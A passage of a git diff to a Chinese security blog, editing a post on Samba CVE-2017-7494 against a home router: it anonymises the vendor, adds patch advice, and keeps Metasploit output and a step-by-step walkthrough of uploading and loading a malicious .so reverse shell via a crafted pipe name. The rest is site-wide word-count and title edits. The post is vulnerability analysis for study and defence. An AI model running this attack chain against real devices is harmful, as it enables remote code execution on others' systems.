/tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 -   &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 -   &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br></pre></td></tr></table></figure>
 <p>虽然报错，但是查看共享文件夹/tmp却发现了生成了.so文件<br>知乎这篇<a href="https://zhuanlan.zhihu.com/p/27129229" target="_blank" rel="noopener">专栏</a>也有相同问题</p>
-<h2 id="分析POC，查找原因"><a href="#分析POC，查找原因" class="headerlink" title="分析POC，查找原因"></a>分析POC，查找原因</h2><p>(来自<a href="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/" target="_blank" rel="noopener">Wz’blog</a>)</p>
-<h3 id="建立SMB连接。若需要账号密码登录，则必须登录后才能继续"><a href="#建立SMB连接。若需要账号密码登录，则必须登录后才能继续" class="headerlink" title="建立SMB连接。若需要账号密码登录，则必须登录后才能继续"></a>建立SMB连接。若需要账号密码登录，则必须登录后才能继续</h3><p>从微软上扒的SMB协议建立时序图：<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-09-40.png" alt></p>
+<h1 id="修补方案"><a href="#修补方案" class="headerlink" title="修补方案"></a>修补方案</h1><p>最安全的方法还是打补丁或者升级到Samba 4.6.4/4.5.10/4.4.14任意版本，可以参考 <a href="https://www.samba.org/samba/history/security.html" target="_blank" rel="noopener">https://www.samba.org/samba/history/security.html</a></p>
+<p>如果暂时不能升级版本或安装补丁，可以使用临时解决方案：<br>在smb.conf的[global]板块中添加参数：nt pipe support = no<br>然后重启smbd服务。</p>
+<h1 id="分析POC，查找原因"><a href="#分析POC，查找原因" class="headerlink" title="分析POC，查找原因"></a>分析POC，查找原因</h1><p>(来自<a href="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/" target="_blank" rel="noopener">Wz’blog</a>)</p>
+<h2 id="建立SMB连接。若需要账号密码登录，则必须登录后才能继续"><a href="#建立SMB连接。若需要账号密码登录，则必须登录后才能继续" class="headerlink" title="建立SMB连接。若需要账号密码登录，则必须登录后才能继续"></a>建立SMB连接。若需要账号密码登录，则必须登录后才能继续</h2><p>从微软上扒的SMB协议建立时序图：<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-09-40.png" alt></p>
 <p>对应POC:</p>
 <p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/23-15-57.png" alt></p>
-<h3 id="利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><a href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path" class="headerlink" title="利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)"></a>利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-38-48.jpg" alt></p>
+<h2 id="利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><a href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path" class="headerlink" title="利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)"></a>利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-38-48.jpg" alt></p>
 <p>其中find_writeable_path()函数需要跟进看一下：<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-14-43.jpg" alt></p>
 <p>再跟进看enumerate_directories()以及verify_writeable_directory函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-48-27.jpg" alt><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-18-44.jpg" alt></p>
 <p>可以看到代码逻辑很清楚，首先遍历出当前路径所有的文件夹，然后尝试往里面写一个随机的txt文件用作可写测试，随后删除掉txt文件，记录下可写的文件路径。<br>至此，我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp)</p>
-<h3 id="利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><a href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath" class="headerlink" title="利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)"></a>利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-26-47.jpg" alt><br>至此获取到了共享名data的绝对路径。<br>值得注意的是，这里跟早期的Payload不一样，早期的payload是靠暴力猜解目录，所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径，极大地提高了攻击的成功率。</p>
-<h3 id="上传恶意so文件"><a href="#上传恶意so文件" class="headerlink" title="上传恶意so文件"></a>上传恶意so文件</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg" alt><br>其中写入的so文件是Metasploit生成的反弹shell，很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数，这个原因上述的漏洞分析也有提及。</p>
-<h3 id="调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功"><a href="#调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功" class="headerlink" title="调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功"></a>调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg" alt><br>利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so，然后通过SMB_COM_NT_CREATE_ANDX进行调用。<br>在复现时，调用恶意so文件总会失败，产生Error Code为：STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况，也许要详细看看smb协议才能知道了。<br>POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志，随后就是用NBSS协议进行了一次远程代码执行的测试，执行代码为echo随机字符串。</p>
-<h3 id="删除恶意so文件，断开smb连接"><a href="#删除恶意so文件，断开smb连接" class="headerlink" title="删除恶意so文件，断开smb连接"></a>删除恶意so文件，断开smb连接</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png" alt></p>
-<p>由msf给出的poc过程可见，对小米路由器的攻击在第五步出现问题，因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND</p>
+<h2 id="利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><a href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath" class="headerlink" title="利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)"></a>利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-26-47.jpg" alt><br>至此获取到了共享名data的绝对路径。<br>值得注意的是，这里跟早期的Payload不一样，早期的payload是靠暴力猜解目录，所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径，极大地提高了攻击的成功率。</p>
+<h2 id="上传恶意so文件"><a href="#上传恶意so文件" class="headerlink" title="上传恶意so文件"></a>上传恶意so文件</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg" alt><br>其中写入的so文件是Metasploit生成的反弹shell，很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数，这个原因上述的漏洞分析也有提及。</p>
+<h2 id="调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功"><a href="#调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功" class="headerlink" title="调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功"></a>调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg" alt><br>利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so，然后通过SMB_COM_NT_CREATE_ANDX进行调用。<br>在复现时，调用恶意so文件总会失败，产生Error Code为：STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况，也许要详细看看smb协议才能知道了。<br>POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志，随后就是用NBSS协议进行了一次远程代码执行的测试，执行代码为echo随机字符串。</p>
+<h2 id="删除恶意so文件，断开smb连接"><a href="#删除恶意so文件，断开smb连接" class="headerlink" title="删除恶意so文件，断开smb连接"></a>删除恶意so文件，断开smb连接</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png" alt></p>
+<p>由msf给出的poc过程可见，对路由器的攻击在第五步出现问题，因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND</p>
 
       
     </div>
@@ -718,7 +721,7 @@
             
 
             
-              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#小米路由器与Samba漏洞CVE-2017-7494"><span class="nav-text">小米路由器与Samba漏洞CVE-2017-7494</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞描述"><span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Samba介绍"><span class="nav-text">Samba介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞成因"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#小米路由器"><span class="nav-text">小米路由器</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击：使用metasploit"><span class="nav-text">攻击：使用metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#设置攻击参数"><span class="nav-text">设置攻击参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行攻击"><span class="nav-text">执行攻击</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析POC，查找原因"><span class="nav-text">分析POC，查找原因</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#建立SMB连接。若需要账号密码登录，则必须登录后才能继续"><span class="nav-text">建立SMB连接。若需要账号密码登录，则必须登录后才能继续</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><span class="nav-text">利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><span class="nav-text">利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#上传恶意so文件"><span class="nav-text">上传恶意so文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功"><span class="nav-text">调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除恶意so文件，断开smb连接"><span class="nav-text">删除恶意so文件，断开smb连接</span></a></li></ol></li></ol></li></ol></div>
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞描述"><span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Samba介绍"><span class="nav-text">Samba介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞成因"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#某路由器满足条件"><span class="nav-text">某路由器满足条件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击：使用metasploit"><span class="nav-text">攻击：使用metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#设置攻击参数"><span class="nav-text">设置攻击参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行攻击"><span class="nav-text">执行攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#修补方案"><span class="nav-text">修补方案</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#分析POC，查找原因"><span class="nav-text">分析POC，查找原因</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#建立SMB连接。若需要账号密码登录，则必须登录后才能继续"><span class="nav-text">建立SMB连接。若需要账号密码登录，则必须登录后才能继续</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><span class="nav-text">利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><span class="nav-text">利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#上传恶意so文件"><span class="nav-text">上传恶意so文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功"><span class="nav-text">调用恶意文件，并执行echo命令打印随机字符串检验是否调用成功</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#删除恶意so文件，断开smb连接"><span class="nav-text">删除恶意so文件，断开smb连接</span></a></li></ol></li></ol></div>
             
 
           </div>
@@ -750,7 +753,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/03/28/逆向工程实验/index.html b/2019/03/28/逆向工程实验/index.html
index 2fc0fe58..2190cd21 100644
--- a/2019/03/28/逆向工程实验/index.html
+++ b/2019/03/28/逆向工程实验/index.html
@@ -646,8 +646,8 @@
         <div class="post-nav">
           <div class="post-nav-next post-nav-item">
             
-              <a href="/2019/03/25/Samba-CVE/" rel="next" title="小米路由器与Samba漏洞CVE-2017-7494">
-                <i class="fa fa-chevron-left"></i> 小米路由器与Samba漏洞CVE-2017-7494
+              <a href="/2019/03/25/Samba-CVE/" rel="next" title="某厂商路由器与Samba漏洞CVE-2017-7494">
+                <i class="fa fa-chevron-left"></i> 某厂商路由器与Samba漏洞CVE-2017-7494
               </a>
             
           </div>
@@ -853,7 +853,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/04/15/Caving-db-storage/index.html b/2019/04/15/Caving-db-storage/index.html
index 7558e9a5..8e2891be 100644
--- a/2019/04/15/Caving-db-storage/index.html
+++ b/2019/04/15/Caving-db-storage/index.html
@@ -774,7 +774,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/04/21/XIAOMI-UPnP/index.html b/2019/04/21/XIAOMI-UPnP/index.html
index 03d7ad64..0a2cb0b8 100644
--- a/2019/04/21/XIAOMI-UPnP/index.html
+++ b/2019/04/21/XIAOMI-UPnP/index.html
@@ -898,7 +898,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/05/13/PE-file/index.html b/2019/05/13/PE-file/index.html
index 5688fdbd..7a5ebcf7 100644
--- a/2019/05/13/PE-file/index.html
+++ b/2019/05/13/PE-file/index.html
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/05/14/pack-and-unpack/index.html b/2019/05/14/pack-and-unpack/index.html
index 2415616a..8390b537 100644
--- a/2019/05/14/pack-and-unpack/index.html
+++ b/2019/05/14/pack-and-unpack/index.html
@@ -739,7 +739,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/01/AFL-first-learn/index.html b/2019/07/01/AFL-first-learn/index.html
index 71c227f8..afa0922e 100644
--- a/2019/07/01/AFL-first-learn/index.html
+++ b/2019/07/01/AFL-first-learn/index.html
@@ -1012,7 +1012,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/09/afl-first-try/index.html b/2019/07/09/afl-first-try/index.html
index 93273d72..c14f1dbf 100644
--- a/2019/07/09/afl-first-try/index.html
+++ b/2019/07/09/afl-first-try/index.html
@@ -802,7 +802,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/10/x86basic/index.html b/2019/07/10/x86basic/index.html
index dc886c84..8f7a2eaa 100644
--- a/2019/07/10/x86basic/index.html
+++ b/2019/07/10/x86basic/index.html
@@ -834,7 +834,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/16/linux-pwn-32/index.html b/2019/07/16/linux-pwn-32/index.html
index 638dc5a4..ea7f8d47 100644
--- a/2019/07/16/linux-pwn-32/index.html
+++ b/2019/07/16/linux-pwn-32/index.html
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/24/web-dvwa/index.html b/2019/07/24/web-dvwa/index.html
index e170de3c..c1525c84 100644
--- a/2019/07/24/web-dvwa/index.html
+++ b/2019/07/24/web-dvwa/index.html
@@ -830,7 +830,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/24/获取固件/index.html b/2019/07/24/获取固件/index.html
index b6cf4740..fd422cab 100644
--- a/2019/07/24/获取固件/index.html
+++ b/2019/07/24/获取固件/index.html
@@ -713,7 +713,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/2019/07/25/Debug-a-router-firmware/index.html b/2019/07/25/Debug-a-router-firmware/index.html
index 423b4226..47a7c328 100644
--- a/2019/07/25/Debug-a-router-firmware/index.html
+++ b/2019/07/25/Debug-a-router-firmware/index.html
@@ -757,7 +757,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/about/index.html b/about/index.html
index fb10d723..d3fe0702 100644
--- a/about/index.html
+++ b/about/index.html
@@ -460,7 +460,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2000/01/index.html b/archives/2000/01/index.html
index 1aa009c2..9aded9d0 100644
--- a/archives/2000/01/index.html
+++ b/archives/2000/01/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2000/index.html b/archives/2000/index.html
index b46311e3..66687c25 100644
--- a/archives/2000/index.html
+++ b/archives/2000/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2018/11/index.html b/archives/2018/11/index.html
index a38c8850..e8bec6b3 100644
--- a/archives/2018/11/index.html
+++ b/archives/2018/11/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2018/12/index.html b/archives/2018/12/index.html
index 86393a0b..f4b4d462 100644
--- a/archives/2018/12/index.html
+++ b/archives/2018/12/index.html
@@ -563,7 +563,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2018/index.html b/archives/2018/index.html
index fd9eb793..b8cb94cd 100644
--- a/archives/2018/index.html
+++ b/archives/2018/index.html
@@ -598,7 +598,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/01/index.html b/archives/2019/01/index.html
index 280c8b55..c1a34f21 100644
--- a/archives/2019/01/index.html
+++ b/archives/2019/01/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/02/index.html b/archives/2019/02/index.html
index e2ede291..517ed86c 100644
--- a/archives/2019/02/index.html
+++ b/archives/2019/02/index.html
@@ -493,7 +493,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/03/index.html b/archives/2019/03/index.html
index 3eeb58aa..65dd2e5e 100644
--- a/archives/2019/03/index.html
+++ b/archives/2019/03/index.html
@@ -363,7 +363,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -598,7 +598,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/04/index.html b/archives/2019/04/index.html
index 9a1ba776..7eec5327 100644
--- a/archives/2019/04/index.html
+++ b/archives/2019/04/index.html
@@ -528,7 +528,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/05/index.html b/archives/2019/05/index.html
index 91eae4d2..594b08b8 100644
--- a/archives/2019/05/index.html
+++ b/archives/2019/05/index.html
@@ -528,7 +528,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/07/index.html b/archives/2019/07/index.html
index f2602164..d1c4aaaf 100644
--- a/archives/2019/07/index.html
+++ b/archives/2019/07/index.html
@@ -703,7 +703,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/index.html b/archives/2019/index.html
index 734fb46e..a67dcd4d 100644
--- a/archives/2019/index.html
+++ b/archives/2019/index.html
@@ -812,7 +812,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/2019/page/2/index.html b/archives/2019/page/2/index.html
index f4ff035d..06916df6 100644
--- a/archives/2019/page/2/index.html
+++ b/archives/2019/page/2/index.html
@@ -398,7 +398,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -707,7 +707,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/index.html b/archives/index.html
index 66006fa3..8cdb5f55 100644
--- a/archives/index.html
+++ b/archives/index.html
@@ -812,7 +812,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/page/2/index.html b/archives/page/2/index.html
index d11466dc..55854282 100644
--- a/archives/page/2/index.html
+++ b/archives/page/2/index.html
@@ -398,7 +398,7 @@
         
             <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
               
-                <span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span>
+                <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
               
             </a>
         
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/archives/page/3/index.html b/archives/page/3/index.html
index 61b1d7a0..bd7c014f 100644
--- a/archives/page/3/index.html
+++ b/archives/page/3/index.html
@@ -537,7 +537,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">67.6k</span>
+    <span title="Site words total count">67.7k</span>
   
 </div>
 
diff --git a/baidusitemap.xml b/baidusitemap.xml
index be52fb86..bd4ef2f2 100644
--- a/baidusitemap.xml
+++ b/baidusitemap.xml
@@ -1,6 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
   <url>
+    <loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
+    <lastmod>2019-07-27</lastmod>
+  </url>  <url>
     <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
     <lastmod>2019-07-26</lastmod>
   </url>  <url>
@@ -48,23 +51,20 @@
   </url>  <url>
     <loc>https://cool-y.github.io/2018/12/15/miio-control/</loc>
     <lastmod>2019-04-15</lastmod>
-  </url>  <url>
